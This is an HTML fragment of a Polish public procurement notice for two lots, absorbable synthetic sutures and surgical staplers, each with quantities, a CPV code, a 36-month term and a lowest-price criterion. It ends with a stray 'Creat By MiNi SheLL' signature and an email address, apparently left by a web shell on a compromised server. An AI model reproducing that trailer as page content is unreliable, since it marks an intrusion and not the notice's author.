<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> MONOFILAMENTOWE Z GLIKONATU, SYNTETYCZNE, WCHŁANIAJACE SIĘ OKOŁO 56 DNI OD ZAIMPLANTOWANIA, OKRES PODTRZYMYWANIA TKANKOWEGO W 50% 5-7 DNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6 poz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> staplery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com